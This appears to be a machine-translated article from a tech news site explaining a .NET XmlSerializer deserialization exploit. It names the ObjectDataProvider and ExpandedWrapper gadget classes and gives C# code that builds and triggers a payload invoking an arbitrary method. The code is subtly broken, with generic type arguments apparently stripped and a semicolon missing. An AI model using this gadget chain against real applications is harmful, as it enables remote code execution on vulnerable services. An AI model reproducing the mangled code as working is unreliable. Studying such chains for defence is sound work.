Example Analysis of .net deserialization vulnerability XmlSerializer 01/22 Update SLTechnology News&Howtos

Example Analysis of .net deserialization vulnerability XmlSerializer

2025-01-22 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Shulou(Shulou.com)05/31 Report--

The editor today takes you to understand the example analysis of the .net deserialization vulnerability XmlSerializer. The knowledge points in the article are introduced in great detail. Friends who feel helpful can browse the content of the article together with the editor, hoping to help more friends who want to solve this problem to find the answer to the problem. Let's follow the editor to learn more about "sample analysis of .net deserialization vulnerability XmlSerializer".

Conditions:

When initializing an object, the type is controllable: new XmlSerializer (type controllable)

When deserializing an object, the input is controllable: serializer.Deserialize (fi controllable)

Two key classes: ObjectDataProvider and ExpandedWrapper

/ / PresentationFramework.dll v4.0.0.0System.Windows.Data.ObjectDataProvider//System.Data.Services.dll v4.0.0.0System.Data.Services.Internal.ExpandedWrapper

Payload generation:

Public static void serializeObjectWithXmlSer () {ExpandedWrapper eobj = new ExpandedWrapper (); XmlSerializer serializer = new XmlSerializer (typeof (ExpandedWrapper)); eobj.ProjectedProperty0 = new ObjectDataProvider (); eobj.ProjectedProperty0.ObjectInstance = new Class2 (); eobj.ProjectedProperty0.MethodName = "writeFile"; eobj.ProjectedProperty0.MethodParameters.Add ("xxxxx"); eobj.ProjectedProperty0.MethodParameters.Add ("ser.txt") TextWriter fo = new StreamWriter ("d:/tmp/xmlser.txt"); serializer.Serialize (fo, eobj); fo.Close ();}

Trigger Payload:

Public static void deserializeObjectWithXmlSer () {XmlSerializer ser = new XmlSerializer (typeof (ExpandedWrapper)); TextReader fi = new StreamReader ("d:/tmp/xmlser.txt"); ser.Deserialize (fi); fi.Close ();} Thank you for reading, this is the whole content of "sample Analysis of .net deserialization vulnerability XmlSerializer". Friends of the society hurry up and get started. I believe that the editor will certainly bring you better quality articles. Thank you for your support to the website!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.